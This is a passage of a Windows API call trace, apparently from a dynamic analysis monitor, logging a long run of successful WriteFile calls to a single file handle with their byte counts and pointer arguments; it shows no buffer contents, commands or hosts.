	[0102.450] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x12, lpOverlapped=0x0) returned 1
	[0102.451] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.451] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x14, lpOverlapped=0x0) returned 1
	[0102.451] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.451] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x4b, lpOverlapped=0x0) returned 1
	[0102.452] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.452] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x25, lpOverlapped=0x0) returned 1
	[0102.452] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.452] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x28, lpOverlapped=0x0) returned 1
	[0102.452] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x41, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x44, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x12, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x12, lpOverlapped=0x0) returned 1
	[0102.453] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0xf, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2a, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x3f, lpOverlapped=0x0) returned 1
	[0102.454] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.455] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x4c, lpOverlapped=0x0) returned 1
	[0102.455] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.455] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x27, lpOverlapped=0x0) returned 1
	[0102.455] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.455] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x44, lpOverlapped=0x0) returned 1
	[0102.456] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.456] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x4c, lpOverlapped=0x0) returned 1
	[0102.456] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.456] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x11, lpOverlapped=0x0) returned 1
	[0102.456] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x53, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x21, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x3f, lpOverlapped=0x0) returned 1
	[0102.457] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x22, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x23, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x15, lpOverlapped=0x0) returned 1
	[0102.458] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x55, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x20, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x35, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x19, lpOverlapped=0x0) returned 1
	[0102.459] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x3a, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x19, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x14, lpOverlapped=0x0) returned 1
	[0102.460] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x23, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x19, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2e, lpOverlapped=0x0) returned 1
	[0102.461] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x49, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x1a, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2c, lpOverlapped=0x0) returned 1
	[0102.462] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x51, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x33, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2a, lpOverlapped=0x0) returned 1
	[0102.463] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x30, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2b, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x50, lpOverlapped=0x0) returned 1
	[0102.464] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0xc, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x29, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x50, lpOverlapped=0x0) returned 1
	[0102.465] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.466] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x44, lpOverlapped=0x0) returned 1
	[0102.466] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.466] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x24, lpOverlapped=0x0) returned 1
	[0102.466] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.467] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2e, lpOverlapped=0x0) returned 1
	[0102.467] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.467] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x3e, lpOverlapped=0x0) returned 1
	[0102.467] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x45, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x1f, lpOverlapped=0x0) returned 1
